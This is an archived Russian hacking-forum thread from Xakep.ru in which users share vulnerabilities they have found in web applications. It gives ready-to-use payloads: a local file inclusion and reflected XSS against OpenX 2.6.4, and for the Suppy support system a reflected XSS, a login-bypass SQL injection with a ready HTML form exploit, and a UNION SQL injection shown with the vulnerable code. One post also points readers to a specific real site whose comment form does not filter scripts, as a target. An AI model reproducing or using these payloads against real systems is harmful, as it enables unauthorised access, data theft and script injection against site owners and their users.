Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Найденные уязвимости

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Найденные уязвимости
Имя
Сообщение << Старые топики   Новые топики >>
Найденные уязвимости - 2010-04-24 14:15:40.483333   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Предлагаю сюда постить уязвимости в различных CMS, скриптах, и т.п. Дабы не создавать темы из-за одной уязвимости :)
Post #: 1
RE: Найденные уязвимости - 2010-04-24 14:16:49.280000   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Ну-с начнём.
OpenX 2.6.4
LFI
Need: Права админа
/openx/www/admin/stats.php?entity=../../../../../../shell&breakdown=Обязательно пустое. [right]// shell, у меня там просто в папке с OpenX лежит файл shell.php, там <?PHP phpinfo(); ?> Код выполнился.[/right]
Если breakdown не вписать, то будет инклюдиться нечто вроде:

openx/lib/OA/Admin/Statistics/Delivery/Controller/../../../../../../shellAdvertiser.php
Пассивная XSS:

openx/www/admin/stats.php?entity=campaign&breakdown=history&clientid=1&campaignid=1%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
Post #: 2
RE: Найденные уязвимости - 2010-04-24 14:48:11.583333   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
Пятой точкой чувствую что это превратиться в передирание постов с ачата…
Post #: 3
RE: Найденные уязвимости - 2010-04-24 15:01:33.863333   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Неа :) Пока у меня минусомёт не отберут, любой копипаст не пройдёт )
Post #: 4
RE: Найденные уязвимости - 2010-04-26 14:25:19.810000   
Seyoga

Сообщений: 151
Оценки: 0
Присоединился: 2010-04-23 11:36:23.830000
Сайт вроде нормальный, недвижимости посвящен, бабки должны были не жалеть, а не режет при написании коментов даже обычные скрипты т.е смело ставить адвордс и усё…
 
http://www.kvadrat.ru/news/26042010_proekt_zastrojki_byvshego_zavoda_petmol_na_moskovskom/
Post #: 5
RE: Найденные уязвимости - 2010-04-28 11:38:08.906666   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Suppy
Suppy is a small supportsystem based on PHP and MySQL. Beta !
Homepage: http://sourceforge.net/projects/suppy/

Пассивная XSS:
quote:

/login.php?error=%3Cscript%3Ealert();%3C/script%3E


Auth ByPass
/login.php
В Anmeldename:
1' or 1=1 /*
Passwort:
12345
Exploit:

quote:


&lt;form method="post" action="http://site.com/login.php"&gt; &lt;input name="name" type="text" value="1' or 1=1 -- " /&gt; &lt;input name="pw" type="password" value="Ulalala"/&gt; &lt;input name="login" type="submit" value="Login" /&gt;



SQL Inj:
quote:

/bb/getfile.php?id=-1+union+select+1,2,3,4,5,6,7,8+–+


Code:
if(isset($_GET['id']) && isset($_SESSION['ID_user'])) { include_once('utils/dbcon.php'); $con = new DBcon(); $con-&gt;AddSQL("SELECT * FROM file "); $con-&gt;AddSQL("WHERE ID_file=".$_GET['id']);
Post #: 6
Страниц:  [1]
Все форумы >> [Уязвимости] >> Найденные уязвимости







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.